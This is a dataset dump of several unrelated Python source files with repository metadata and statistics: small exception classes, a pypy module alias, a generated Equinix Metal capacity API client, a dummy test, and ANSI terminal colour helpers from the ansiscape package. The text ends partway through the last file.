2020-10-25T18:11:22.000Z
|
from werkzeug.exceptions import BadRequestKeyError
class InvalidGETRequest(BadRequestKeyError):
pass
class CampaignDoesNotExist(BadRequestKeyError):
pass
| 16.6
| 50
| 0.825301
| 13
| 166
| 10.538462
| 0.692308
| 0.321168
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.13253
| 166
| 9
| 51
| 18.444444
| 0.951389
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.4
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
e5c5d1c82c3889cd36c60debee773af97134d527
| 89
|
py
|
Python
|
pypy/module/test_lib_pypy/pyrepl/__init__.py
|
akercheval/espy
|
f8317d2f01ba726ed4f03cab081176c32ae4cac4
|
[
"Apache-2.0",
"OpenSSL"
] | 4
|
2019-02-11T06:58:43.000Z
|
2020-03-15T14:12:32.000Z
|
pypy/module/test_lib_pypy/pyrepl/__init__.py
|
akercheval/espy
|
f8317d2f01ba726ed4f03cab081176c32ae4cac4
|
[
"Apache-2.0",
"OpenSSL"
] | null | null | null |
pypy/module/test_lib_pypy/pyrepl/__init__.py
|
akercheval/espy
|
f8317d2f01ba726ed4f03cab081176c32ae4cac4
|
[
"Apache-2.0",
"OpenSSL"
] | null | null | null |
import sys
import lib_pypy.pyrepl
sys.modules['pyrepl'] = sys.modules['lib_pypy.pyrepl']
| 22.25
| 54
| 0.775281
| 14
| 89
| 4.785714
| 0.428571
| 0.208955
| 0.38806
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078652
| 89
| 3
| 55
| 29.666667
| 0.817073
| 0
| 0
| 0
| 0
| 0
| 0.235955
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e5c68503425412f81cebe05fe31512438af3d279
| 36,215
|
py
|
Python
|
metal/models/capacity_api.py
|
displague/metal-python
|
96e64e9ac41025d85ff6f61693165e29e1c366db
|
[
"MIT"
] | null | null | null |
metal/models/capacity_api.py
|
displague/metal-python
|
96e64e9ac41025d85ff6f61693165e29e1c366db
|
[
"MIT"
] | 3
|
2021-09-27T05:10:36.000Z
|
2021-09-27T06:10:57.000Z
|
metal/models/capacity_api.py
|
displague/metal-python
|
96e64e9ac41025d85ff6f61693165e29e1c366db
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Metal API
This is the API for Equinix Metal. The API allows you to programmatically interact with all of your Equinix Metal resources, including devices, networks, addresses, organizations, projects, and your user account. The official API docs are hosted at <https://metal.equinix.com/developers/api>. # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: support@equinixmetal.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from metal.api_client import ApiClient
from metal.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class CapacityApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def check_capacity_for_facility(self, facility, **kwargs): # noqa: E501
"""Check capacity # noqa: E501
Validates if a deploy can be fulfilled. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.check_capacity_for_facility(facility, async_req=True)
>>> result = thread.get()
:param facility: Facility to check capacity in (required)
:type facility: CapacityInput
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: CapacityCheckPerFacilityList
"""
kwargs['_return_http_data_only'] = True
return self.check_capacity_for_facility_with_http_info(facility, **kwargs) # noqa: E501
def check_capacity_for_facility_with_http_info(self, facility, **kwargs): # noqa: E501
"""Check capacity # noqa: E501
Validates if a deploy can be fulfilled. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.check_capacity_for_facility_with_http_info(facility, async_req=True)
>>> result = thread.get()
:param facility: Facility to check capacity in (required)
:type facility: CapacityInput
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(CapacityCheckPerFacilityList, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'facility'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method check_capacity_for_facility" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'facility' is set
if self.api_client.client_side_validation and ('facility' not in local_var_params or # noqa: E501
local_var_params['facility'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `facility` when calling `check_capacity_for_facility`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'facility' in local_var_params:
body_params = local_var_params['facility']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "CapacityCheckPerFacilityList",
401: "Error",
422: "Error",
}
return self.api_client.call_api(
'/capacity', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def check_capacity_for_metro(self, servers, **kwargs): # noqa: E501
"""Check capacity for a metro # noqa: E501
Validates if a deploy can be fulfilled in a metro. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.check_capacity_for_metro(servers, async_req=True)
>>> result = thread.get()
:param servers: Metro to check capacity in (required)
:type servers: CapacityPerMetroInput
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: CapacityCheckPerMetroList
"""
kwargs['_return_http_data_only'] = True
return self.check_capacity_for_metro_with_http_info(servers, **kwargs) # noqa: E501
def check_capacity_for_metro_with_http_info(self, servers, **kwargs): # noqa: E501
"""Check capacity for a metro # noqa: E501
Validates if a deploy can be fulfilled in a metro. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.check_capacity_for_metro_with_http_info(servers, async_req=True)
>>> result = thread.get()
:param servers: Metro to check capacity in (required)
:type servers: CapacityPerMetroInput
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(CapacityCheckPerMetroList, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'servers'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method check_capacity_for_metro" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'servers' is set
if self.api_client.client_side_validation and ('servers' not in local_var_params or # noqa: E501
local_var_params['servers'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `servers` when calling `check_capacity_for_metro`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'servers' in local_var_params:
body_params = local_var_params['servers']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "CapacityCheckPerMetroList",
401: "Error",
422: "Error",
}
return self.api_client.call_api(
'/capacity/metros', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def find_capacity_for_facility(self, **kwargs): # noqa: E501
"""View capacity # noqa: E501
Returns a list of facilities and plans with their current capacity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_capacity_for_facility(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: CapacityList
"""
kwargs['_return_http_data_only'] = True
return self.find_capacity_for_facility_with_http_info(**kwargs) # noqa: E501
def find_capacity_for_facility_with_http_info(self, **kwargs): # noqa: E501
"""View capacity # noqa: E501
Returns a list of facilities and plans with their current capacity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_capacity_for_facility_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(CapacityList, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method find_capacity_for_facility" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "CapacityList",
401: "Error",
}
return self.api_client.call_api(
'/capacity', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def find_capacity_for_metro(self, **kwargs): # noqa: E501
"""View capacity for metros # noqa: E501
Returns a list of metros and plans with their current capacity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_capacity_for_metro(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: MetroCapacityList
"""
kwargs['_return_http_data_only'] = True
return self.find_capacity_for_metro_with_http_info(**kwargs) # noqa: E501
def find_capacity_for_metro_with_http_info(self, **kwargs): # noqa: E501
"""View capacity for metros # noqa: E501
Returns a list of metros and plans with their current capacity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_capacity_for_metro_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(MetroCapacityList, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method find_capacity_for_metro" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "MetroCapacityList",
401: "Error",
}
return self.api_client.call_api(
'/capacity/metros', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def find_organization_capacity_per_facility(self, id, **kwargs): # noqa: E501
"""View available hardware plans per Facility for given organization # noqa: E501
Returns a list of facilities and plans with their current capacity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_organization_capacity_per_facility(id, async_req=True)
>>> result = thread.get()
:param id: Organization UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: CapacityList
"""
kwargs['_return_http_data_only'] = True
return self.find_organization_capacity_per_facility_with_http_info(id, **kwargs) # noqa: E501
def find_organization_capacity_per_facility_with_http_info(self, id, **kwargs): # noqa: E501
"""View available hardware plans per Facility for given organization # noqa: E501
Returns a list of facilities and plans with their current capacity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_organization_capacity_per_facility_with_http_info(id, async_req=True)
>>> result = thread.get()
:param id: Organization UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(CapacityList, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method find_organization_capacity_per_facility" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `find_organization_capacity_per_facility`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "CapacityList",
401: "Error",
403: "Error",
}
return self.api_client.call_api(
'/organizations/{id}/capacity', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def find_organization_capacity_per_metro(self, id, **kwargs): # noqa: E501
"""View available hardware plans per Metro for given organization # noqa: E501
Returns a list of metros and plans with their current capacity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_organization_capacity_per_metro(id, async_req=True)
>>> result = thread.get()
:param id: Organization UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: MetroCapacityList
"""
kwargs['_return_http_data_only'] = True
return self.find_organization_capacity_per_metro_with_http_info(id, **kwargs) # noqa: E501
def find_organization_capacity_per_metro_with_http_info(self, id, **kwargs): # noqa: E501
"""View available hardware plans per Metro for given organization # noqa: E501
Returns a list of metros and plans with their current capacity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_organization_capacity_per_metro_with_http_info(id, async_req=True)
>>> result = thread.get()
:param id: Organization UUID (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(MetroCapacityList, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method find_organization_capacity_per_metro" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `find_organization_capacity_per_metro`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['x_auth_token'] # noqa: E501
response_types_map = {
200: "MetroCapacityList",
401: "Error",
403: "Error",
}
return self.api_client.call_api(
'/organizations/{id}/capacity/metros', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
| 42.857988
| 312
| 0.59514
| 3,963
| 36,215
| 5.180419
| 0.059551
| 0.031953
| 0.047735
| 0.031564
| 0.950852
| 0.945251
| 0.944618
| 0.937068
| 0.932733
| 0.924208
| 0
| 0.012868
| 0.336932
| 36,215
| 844
| 313
| 42.908768
| 0.842086
| 0.495402
| 0
| 0.742547
| 0
| 0
| 0.164681
| 0.052303
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03523
| false
| 0
| 0.01355
| 0
| 0.084011
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e5fc9c9f2ae31f5f6eb9c65e3b6b0811d84a613c
| 89
|
py
|
Python
|
hardware/tests/test_remove.py
|
y3rsh/opentrons
|
b446567910db218030fef40396ab2255cc074bba
|
[
"Apache-2.0"
] | 235
|
2017-10-27T20:37:27.000Z
|
2022-03-30T14:09:49.000Z
|
hardware/tests/test_remove.py
|
y3rsh/opentrons
|
b446567910db218030fef40396ab2255cc074bba
|
[
"Apache-2.0"
] | 8,425
|
2017-10-26T15:25:43.000Z
|
2022-03-31T23:54:26.000Z
|
hardware/tests/test_remove.py
|
y3rsh/opentrons
|
b446567910db218030fef40396ab2255cc074bba
|
[
"Apache-2.0"
] | 130
|
2017-11-09T21:02:37.000Z
|
2022-03-15T18:01:24.000Z
|
"""A dummy test."""
def test_remove() -> None:
"""A dummy test."""
assert True
| 12.714286
| 26
| 0.539326
| 12
| 89
| 3.916667
| 0.666667
| 0.255319
| 0.425532
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.247191
| 89
| 6
| 27
| 14.833333
| 0.701493
| 0.303371
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f9191366e93391df510ee0a953e79053dea7e68b
| 8,970
|
py
|
Python
|
ansiscape/__init__.py
|
cariad/ansiscape
|
07118b68729fcdc2198fc69c35bb1e9ef1bb5b80
|
[
"MIT"
] | null | null | null |
ansiscape/__init__.py
|
cariad/ansiscape
|
07118b68729fcdc2198fc69c35bb1e9ef1bb5b80
|
[
"MIT"
] | 30
|
2021-09-05T13:56:21.000Z
|
2021-10-05T11:14:11.000Z
|
ansiscape/__init__.py
|
cariad/ansiscape
|
07118b68729fcdc2198fc69c35bb1e9ef1bb5b80
|
[
"MIT"
] | null | null | null |
from ansiscape.enums import InterpretationKey, NamedColor, SelectGraphicRendition
from ansiscape.handlers import get_color_interpreter, get_interpreter_for_sgr
from ansiscape.interpreters import register_interpreters
from ansiscape.sequence import Sequence
from ansiscape.types import Color, Interpretation, SequencePart, SequenceType
from ansiscape.version import get_version
register_interpreters()
def alternative_font_0(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FONT_ALT_0, *parts)
def alternative_font_1(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FONT_ALT_1, *parts)
def alternative_font_2(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FONT_ALT_2, *parts)
def alternative_font_3(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FONT_ALT_3, *parts)
def alternative_font_4(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FONT_ALT_4, *parts)
def alternative_font_5(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FONT_ALT_5, *parts)
def alternative_font_6(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FONT_ALT_6, *parts)
def alternative_font_7(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FONT_ALT_7, *parts)
def alternative_font_8(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FONT_ALT_8, *parts)
def background(color: Color, *parts: SequencePart) -> SequenceType:
i = get_color_interpreter(InterpretationKey.BACKGROUND)
return i.make_sequence(color, *parts)
def black(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FOREGROUND_BLACK, *parts)
def black_background(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.BACKGROUND_BLACK, *parts)
def blackletter(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.CALLIGRAPHY_BLACKLETTER, *parts)
def blue(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.FOREGROUND_BLUE, *parts)
def blue_background(*parts: SequencePart) -> SequenceType:
return make_sequence(SelectGraphicRendition.BACKGROUND_BLUE, *parts)
def bright_black(*parts: SequencePart) -> SequenceType:
return foreground(NamedColor.BRIGHT_BLACK, *parts)
def bright_black_background(*parts: SequencePart) -> SequenceType:
return background(NamedColor.BRIGHT_BLACK, *parts)
def bright_blue(*parts: SequencePart) -> SequenceType:
return foreground(NamedColor.BRIGHT_BLUE, *parts)
def bright_blue_background(*parts: SequencePart) -> SequenceType:
return background(NamedColor.BRIGHT_BLUE, *parts)
def bright_cyan(*parts: SequencePart) -> SequenceType:
return foreground(NamedColor.BRIGHT_CYAN, *parts)
def bright_cyan_background(*parts: SequencePart) -> SequenceType:
return background(NamedColor.BRIGHT_CYAN, *parts)
def bright_green(*parts: SequencePart) -> SequenceType:
return foreground(NamedColor.BRIGHT_GREEN, *parts)
def bright_green_background(*parts: SequencePart) -> SequenceType:
return background(NamedColor.BRIGHT_GREEN, *parts)
def bright_magenta(*parts: SequencePart) -> SequenceType:
return foreground(NamedColor.BRIGHT_MAGENTA, *parts)
def bright_magenta_background(*parts: SequencePart) -> SequenceType:
return background(NamedColor.BRIGHT_MAGENTA, *parts)
def bright_red(*parts: SequencePart) -> SequenceType:
